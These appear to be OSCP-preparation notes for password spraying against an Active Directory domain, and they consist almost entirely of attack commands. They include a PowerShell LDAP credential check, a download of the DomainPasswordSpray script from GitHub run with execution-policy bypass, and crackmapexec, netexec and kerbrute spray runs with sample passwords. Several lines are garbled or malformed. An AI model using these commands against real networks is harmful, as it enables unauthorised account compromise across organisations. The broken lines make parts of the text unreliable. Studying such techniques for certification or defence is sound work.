# First check lockdown policy.
net accountsLast updated
# we used the DirectoryEntry constructor without arguments, but we can provide three arguments, including the LDAP path to the domain controller, the username, and the password:
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
New-Object System.DirectoryServices.DirectoryEntry($SearchString, "pete", "Nexus123!")
# If the username and password are correct then the value will be displayed.
# If not correct then an incorrect msg will be shown.
# You can use below script for the password spraying.
powershell -c "wget https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/refs/heads/master/DomainPasswordSpray.ps1" -o Spray-Passwords.ps1"
# if not loading then first download in kali and then send it to the victim machine.
powershell -ep bypass
# For command related help visit the github page.
. ./Spray-Passwords.ps1
# Loaded the module.
Invoke-DomainPasswordSpray -Password Nexus123!
# It will show number of user found and then it will ask if you want to spray the password.
# ----
# Other same script (Got During OSCP Preparation)
https://raw.githubusercontent.com/michele-dedonno/MDD-scripts/refs/heads/master/Spray-Passwords.ps1
.\Spray-Passwords.ps1 -Pass Nexus123! -Admin# This is very noisy.
# Make a list of user.
crackmapexec <protocol> 192.168.112.0/24 -u mike -p 'Darkness1099!'
crackmapexec smb $ip -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success
netexec smb $ip -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success
# We will use tool like kerbrute
# we can use it in kali as well as in windows.
.\kerbrute_windows_amd64.exe passwordspray -d corp.com C:\temp\users.txt "Nexus123!"